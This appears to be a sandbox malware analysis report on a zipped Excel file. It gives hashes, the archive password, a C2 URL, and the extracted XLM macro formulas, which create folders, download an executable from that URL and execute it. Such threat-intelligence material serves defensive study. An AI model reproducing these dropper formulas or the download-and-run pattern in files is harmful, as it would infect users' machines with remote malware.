Overview

overview

10

Static

static

10

0ff0692939...18.xls

windows7-x64

10

0ff0692939...18.xls

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.zip

  • Size

    85KB

  • MD5

    8e9252a52f41b4adee25949bdba0496a

  • SHA1

    061b8bebf86e8d7aecf1b2b6c3cff2a55fc86087

  • SHA256

    11ff1df44d316934267b2f7afe24889968ba45c7b44ad6e610a5062f13705d72

  • SHA512

    d6cd316035884af99d4212d509dccf4e31233f0065d75e5123cc0345dc71b80d3c90937b51f0d97d35a6c2035c4d9219e8a36d6e13861f833fbceeb5f6eb8ed5

  • SSDEEP

    1536:7eoi+XMGiZE6AxQPnuztVvK4O9fIMS/nUeGdhDwWfYjtO2aO6vzoVG8Y:Li+dVxQPuztFKJfL6WQhO2a5ghY

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj",0) =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj\IOKVYnJ",0) =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",,0,0) =HALT()

Signatures

Files

  • 0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.zip
    .zip

    Password: infected

  • 0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.xlsx
    .xls .xlsx windows office2003